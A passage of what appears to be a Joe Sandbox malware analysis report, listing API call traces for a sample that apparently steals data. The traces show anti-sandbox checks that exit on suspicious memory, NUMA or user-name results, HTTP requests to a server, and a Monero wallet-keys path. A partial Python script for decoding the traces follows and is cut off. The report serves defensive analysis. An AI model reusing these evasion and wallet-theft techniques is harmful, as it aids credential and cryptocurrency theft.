                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: c38e8760d2bb3db2a27486f73b52fef05d3ae3c5d8b3880003e66ab8abc2965c
                                        • Instruction ID: 78939fbf98193c7a4bebe263aeba877d6ea3eb03d121bdd9a0f4e15216df810e
                                        • Opcode Fuzzy Hash: c38e8760d2bb3db2a27486f73b52fef05d3ae3c5d8b3880003e66ab8abc2965c
                                        • Instruction Fuzzy Hash: 80E133B1910508EACB14FBA0ED6AFED733DAF54305F40855CB50666191EF39AF48CB62

                                        Control-flow Graph

                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 007C1A15
                                        • ExitProcess.KERNEL32 ref: 007C1A21
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 3f4555291b9fa067704dd4b085bcb56b4feee1b77cc019edf67490f452e16229
                                        • Instruction ID: c0d25f593ebae8f323b6f8fa693ef1d160ee4fa9649abb554c0debed769ccb8a
                                        • Opcode Fuzzy Hash: 3f4555291b9fa067704dd4b085bcb56b4feee1b77cc019edf67490f452e16229
                                        • Instruction Fuzzy Hash: E35108B4B08209EBCB14DF94D958FAE77BAAF45704F60806DF402AB251E778ED41CB61

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651510), ref: 007C9BF1
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,016515A0), ref: 007C9C0A
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,016516C0), ref: 007C9C22
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651720), ref: 007C9C3A
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651528), ref: 007C9C53
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01658B08), ref: 007C9C6B
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01645088), ref: 007C9C83
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01645328), ref: 007C9C9C
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651570), ref: 007C9CB4
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,016516D8), ref: 007C9CCC
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651588), ref: 007C9CE5
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01651738), ref: 007C9CFD
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,01645208), ref: 007C9D15
                                          • Part of subcall function 007C9BB0: GetProcAddress.KERNEL32(77190000,016515B8), ref: 007C9D2E
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007B11D0: ExitProcess.KERNEL32 ref: 007B1211
                                          • Part of subcall function 007B1160: GetSystemInfo.KERNEL32(?), ref: 007B116A
                                          • Part of subcall function 007B1160: ExitProcess.KERNEL32 ref: 007B117E
                                          • Part of subcall function 007B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B112B
                                          • Part of subcall function 007B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 007B1132
                                          • Part of subcall function 007B1110: ExitProcess.KERNEL32 ref: 007B1143
                                          • Part of subcall function 007B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007B123E
                                          • Part of subcall function 007B1220: __aulldiv.LIBCMT ref: 007B1258
                                          • Part of subcall function 007B1220: __aulldiv.LIBCMT ref: 007B1266
                                          • Part of subcall function 007B1220: ExitProcess.KERNEL32 ref: 007B1294
                                          • Part of subcall function 007C6A10: GetUserDefaultLangID.KERNEL32 ref: 007C6A14
                                          • Part of subcall function 007B1190: ExitProcess.KERNEL32 ref: 007B11C6
                                          • Part of subcall function 007C79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007B11B7), ref: 007C7A10
                                          • Part of subcall function 007C79E0: RtlAllocateHeap.NTDLL(00000000), ref: 007C7A17
                                          • Part of subcall function 007C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007C7A2F
                                          • Part of subcall function 007C7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7AA0
                                          • Part of subcall function 007C7A70: RtlAllocateHeap.NTDLL(00000000), ref: 007C7AA7
                                          • Part of subcall function 007C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007C7ABF
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01658B98,?,007D10F4,?,00000000,?,007D10F8,?,00000000,007D0AF3), ref: 007C6D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007C6D88
                                        • CloseHandle.KERNEL32(00000000), ref: 007C6D99
                                        • Sleep.KERNEL32(00001770), ref: 007C6DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01658B98,?,007D10F4,?,00000000,?,007D10F8,?,00000000,007D0AF3), ref: 007C6DBA
                                        • ExitProcess.KERNEL32 ref: 007C6DC2
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: 5bfb5f4b7edceef2a11cc6228dab8cbb29f3a99ba1321094d669e8fe89ae284f
                                        • Instruction ID: a822519cfa190d95f4f67fa955be1311f361cb8b8a0738f71b35c9eda602dc6d
                                        • Opcode Fuzzy Hash: 5bfb5f4b7edceef2a11cc6228dab8cbb29f3a99ba1321094d669e8fe89ae284f
                                        • Instruction Fuzzy Hash: 1731F8B1A0420CEACB04FBE0DCAEFEE7379AF14705F50495DF212A6192DF7869058766

                                        Control-flow Graph

                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007B123E
                                        • __aulldiv.LIBCMT ref: 007B1258
                                        • __aulldiv.LIBCMT ref: 007B1266
                                        • ExitProcess.KERNEL32 ref: 007B1294
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: 17eba481f645fcd1e6b299ff4c4e4f80cfb4e54f68e9951dd3d26e935f9563ee
                                        • Instruction ID: d801fd8a0453d9d3d57de08b1a86c1e3f8da6a9c56b2e1b42523bf07f1507bd6
                                        • Opcode Fuzzy Hash: 17eba481f645fcd1e6b299ff4c4e4f80cfb4e54f68e9951dd3d26e935f9563ee
                                        • Instruction Fuzzy Hash: B6016DB0E40308FAEB10DFE0CC5AFEEBB78BB14705FA08459F605BA1C0D6B899418759

                                        Control-flow Graph

                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01658B98,?,007D10F4,?,00000000,?,007D10F8,?,00000000,007D0AF3), ref: 007C6D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007C6D88
                                        • CloseHandle.KERNEL32(00000000), ref: 007C6D99
                                        • Sleep.KERNEL32(00001770), ref: 007C6DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01658B98,?,007D10F4,?,00000000,?,007D10F8,?,00000000,007D0AF3), ref: 007C6DBA
                                        • ExitProcess.KERNEL32 ref: 007C6DC2
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: d9fa232a5445451b32881fdd4c9d181197175a9049a8f6cee32a7ba96fdc4687
                                        • Instruction ID: 17eaf4167952bfb316ad6ae3fd3060c57b872b3b0380796fb676015b8687f698
                                        • Opcode Fuzzy Hash: d9fa232a5445451b32881fdd4c9d181197175a9049a8f6cee32a7ba96fdc4687
                                        • Instruction Fuzzy Hash: 35F03A70B48209EBEF00EBE0DC8EFBD3374AB14B02F20061DB513A51A5DBB89501CB51

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 091fab785d60116a4ffe14357f0e2d76f4df51852ef0e01fea05bde07f95d3bf
                                        • Instruction ID: e559c736c75f3471a6c10595710f60f756885dcbda59eb8b55256de427b6466f
                                        • Opcode Fuzzy Hash: 091fab785d60116a4ffe14357f0e2d76f4df51852ef0e01fea05bde07f95d3bf
                                        • Instruction Fuzzy Hash: C82130B1D00209ABDF14EFA4EC4ABDD7B75FB44351F108629F615A7290DB706A09CB91

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B62D0: InternetOpenA.WININET(007D0DFF,00000001,00000000,00000000,00000000), ref: 007B6331
                                          • Part of subcall function 007B62D0: StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B6353
                                          • Part of subcall function 007B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6385
                                          • Part of subcall function 007B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B63D5
                                          • Part of subcall function 007B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B640F
                                          • Part of subcall function 007B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C5478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 35702b9aa517b1b50dc7da3a10cc866f3f2a5d8a88b76ac89ffef27220a37cb8
                                        • Instruction ID: 4802d9d8a77def83a7803d4128554b2f595ed15b4d7d7bcbb3f2f68b47d722c6
                                        • Opcode Fuzzy Hash: 35702b9aa517b1b50dc7da3a10cc866f3f2a5d8a88b76ac89ffef27220a37cb8
                                        • Instruction Fuzzy Hash: FF111C70A0010CFACB18FFA4D9AAFED7339AF50345F80855CF91A56592EB38AB04CB51
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 007C7ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 7dd9f5efcb8ffddd7853708145a09ba5288bab42c664e3a04d72ccb404519531
                                        • Instruction ID: 5198c5274cbaed9c36e16a836ccfa71be08b599924c3502e813680e167cff6fb
                                        • Opcode Fuzzy Hash: 7dd9f5efcb8ffddd7853708145a09ba5288bab42c664e3a04d72ccb404519531
                                        • Instruction Fuzzy Hash: BF0186B1908249ABC714CF98DD85FAEBBB8F744711F10412EF505E2280E7789A00CBA1
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 007B1132
                                        • ExitProcess.KERNEL32 ref: 007B1143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: e9e65de0e07dbf6483f6869810c47d858f5854b81510b4902ffa7dc5a920a1af
                                        • Instruction ID: 2252bc177265191f36afa9ddfb1aea6012f82e5b78aff6d486c8c23bf760efb6
                                        • Opcode Fuzzy Hash: e9e65de0e07dbf6483f6869810c47d858f5854b81510b4902ffa7dc5a920a1af
                                        • Instruction Fuzzy Hash: 6EE0867094930CFBE710ABD09C0EB8C766C9B04B01F600154F708761D0D6B465404B58
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007B10B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007B10F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 80e11bd3a9bc4a3b9305f176b9edcdd8767ebb04e76f2873372424bfa0355818
                                        • Instruction ID: f6649813bb1bd0f0df5adba000de8c6d39b15b6972028d9691d078a76ddc0a2c
                                        • Opcode Fuzzy Hash: 80e11bd3a9bc4a3b9305f176b9edcdd8767ebb04e76f2873372424bfa0355818
                                        • Instruction Fuzzy Hash: CAF0E2B1641208BBE714AAA4AC59FAEB798E705B04F700448F500E3290D5719E00CBA0
                                        APIs
                                          • Part of subcall function 007C7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7AA0
                                          • Part of subcall function 007C7A70: RtlAllocateHeap.NTDLL(00000000), ref: 007C7AA7
                                          • Part of subcall function 007C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007C7ABF
                                          • Part of subcall function 007C79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007B11B7), ref: 007C7A10
                                          • Part of subcall function 007C79E0: RtlAllocateHeap.NTDLL(00000000), ref: 007C7A17
                                          • Part of subcall function 007C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007C7A2F
                                        • ExitProcess.KERNEL32 ref: 007B11C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: b0ee3c0a34f32f6767970fc415cf5ad0c82901f36bd02148769a618244856caf
                                        • Instruction ID: bdd2a69cab4f80936cb7a259c2f8314003ef19663a5af09e3b675d8d3d63c38a
                                        • Opcode Fuzzy Hash: b0ee3c0a34f32f6767970fc415cf5ad0c82901f36bd02148769a618244856caf
                                        • Instruction Fuzzy Hash: 79E0E2B590820992DA14B7F9AC1AF6E339C5B1430AF40081CFA0886112EE29EC028666
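The four entries above (the WinINet chain inside 007B62D0, the GetCurrentProcess/VirtualAllocExNuma/ExitProcess sequence, the 0x17C841C0-byte VirtualAlloc/VirtualFree pair, and the GetComputerNameA/GetUserNameA/ExitProcess entry) read much more easily once the raw argument words are decoded. The script below is an added example; it is not part of the Joe Sandbox report and not code from the sample. It parses the report's "APIs" lines, names the documented Windows constants in them (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE, 0x8000 = MEM_RELEASE, 0x17C841C0 = 399,000,000 bytes, HttpOpenRequestA flags 0x00400100 = INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, InternetSetOptionA option 0x1F = INTERNET_OPTION_SECURITY_FLAGS), and tags the call patterns that usually mean a sandbox check or a C2 request. Two points are interpretation rather than report text: the five values printed after GetCurrentProcess are read as the arguments already pushed for the VirtualAllocExNuma call that follows (the sandbox prints the stack at the call site, and the values fit that signature), and the "gate" labels assume the ExitProcess calls are conditional on the preceding check, which the listing does not show. The at_<ref> block names and the rule names are labels of this script, not symbols from the sample.

```python
import re
from dataclasses import dataclass

# Added example, not part of the Joe Sandbox report or of the sample's code.
# Constructed input: the "APIs" lines of four function entries from this report,
# one blank-line-separated block per function.
SAMPLE = """
• Part of subcall function 007B62D0: InternetOpenA.WININET(007D0DFF,00000001,00000000,00000000,00000000), ref: 007B6331
• Part of subcall function 007B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6385
• Part of subcall function 007B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B63D5
• Part of subcall function 007B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B640F
• Part of subcall function 007B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6421

• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 007B1132
• ExitProcess.KERNEL32 ref: 007B1143

• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007B10B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007B10F7

• Part of subcall function 007C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007C7ABF
• Part of subcall function 007C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007C7A2F
• ExitProcess.KERNEL32 ref: 007B11C6
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")

# Documented Windows constants for the parameters worth decoding.
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
INET = {0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x100: "INTERNET_FLAG_PRAGMA_NOCACHE"}

@dataclass
class Call:
    api: str
    args: list
    ref: str
    sub: str = ""   # callee address on lines marked "Part of subcall function"

def hexval(tok):
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok

def parse(text):
    """Label -> calls per block.  A block is labelled by its first direct call site
    ("at_<ref>", a label of this script) or, if every line is a subcall, by that address."""
    functions = {}
    for block in re.split(r"\n\s*\n", text.strip()):
        calls = [Call(m["api"], [hexval(a) for a in m["args"].split(",")] if m["args"] else [],
                      m["ref"], m["sub"] or "")
                 for m in map(CALL_RE.match, block.splitlines()) if m]
        direct = [c for c in calls if not c.sub]
        if calls:
            functions[f"at_{direct[0].ref}" if direct else calls[0].sub] = calls
    return functions

def flags(value, table):
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def decode(c):
    """Name the constants in the calls that matter for triage; '' for the rest."""
    a = c.args
    n = [x if isinstance(x, int) else None for x in a] + [None] * 8   # padded int view
    if c.api == "VirtualAlloc" and None not in n[1:4]:
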